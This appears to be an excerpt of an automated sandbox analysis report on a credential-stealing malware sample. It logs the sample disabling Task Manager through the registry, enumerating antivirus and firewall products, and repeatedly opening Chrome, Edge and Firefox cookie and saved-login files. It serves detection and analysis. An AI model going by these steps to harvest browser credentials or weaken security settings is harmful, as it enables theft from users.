                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0027B146 GetVersionExW,0_2_0027B146
                        Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Windows\SysWOW64\reg.exe Registry value created: DisableTaskMgr 1
                        Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        Source: Yara match File source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: ComrefNetsvc.exe PID: 7956, type: MEMORYSTR
                        Source: Yara match File source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara match File source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara match File source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara match File source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
